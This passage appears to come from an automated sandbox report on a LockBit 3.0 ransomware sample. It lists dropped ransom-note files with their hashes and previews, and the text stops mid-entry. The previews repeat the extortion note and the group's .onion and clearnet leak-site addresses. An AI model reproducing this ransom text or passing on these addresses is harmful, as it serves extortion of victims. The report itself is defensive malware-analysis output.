                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.97950928102242
                Encrypted:false
                SSDEEP:192:PRV931j9Ad6d6HRpLjqRmzlwb2CkocCjALSHpZo:fBF9SRpfqRmzeb2HnXLSHA
                MD5:72185BE936705FF4540A07FA6BDE47EC
                SHA1:1AFC09E6708F430304C323EC599974937534F0B0
                SHA-256:44331057C6B5979CBC7513F3ECA80D39B93B00613FAC653CF851EC94F5435E11
                SHA-512:992F9D0ED3E369A3592406250934F06348691F11B2F73688875647807946881042992DFDDE471939688E93881EAA9DDC13F48A0C0923642B26A58CD3336F706A
                Malicious:false
                Preview:..{.M[.F......[."....tx.=.9...W.$|H{.9..7......Y...~..s.)-.AQ.x.>x...%#'..H...R.......K....4.....Uk.J..:.>....5...9u..G%...q.......S..i+...!2w...i..N....1P...0...mR.I.1d....7..?.!...Ir.......m.(..WS. ..`...t.J... ..{.1[...P..Z.?.g.BL...a.4w3j.....I&-.-..X..:.la.y..R..S!.C.*i...*..v.oL.e.........$..tU....z..=Z....4q..mj.SN.|.~.hd...-n.T...g..7.@...3.H.};{...9..<(....:..S.aXc.K....3.b...U.:.gy...........}a.......*..N.2-U..R.B.......Yn.v.....[;.c....~..i#.%N.[.r.[W.+1h.tj=.Yl...a..h....x.:.%....7..@..m..(]2!.w`..M.`.j.*'..F<..W...Kx..,S......gQXc..:PZsJ..k.W.2.(dx...g.C.&..X+|RQ.6.V..0..].b..!)[.-..x.r.L..^...ps.._`...+.mR.iW.n6j...kss..?C.Oia..H.G.....f..o..8...uw.X..)..FQ./=...A.<......E..)f.`..&.3zJ5......0v...V6.K.].[ =.@._......-.r..n.Hi.S...w4.*....!...y~K......$yz.W.q...C....Q.yl.d.J.jf*u..s.].o.%7.F..T.P.s...9...@td.X#.4.r..}.+..<...A..3.I...U..:.{v..P.....8.....R~z..V.p...?..N0.N.B..]k.g....^{.e....UtV?$......q|r .....>.P....

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
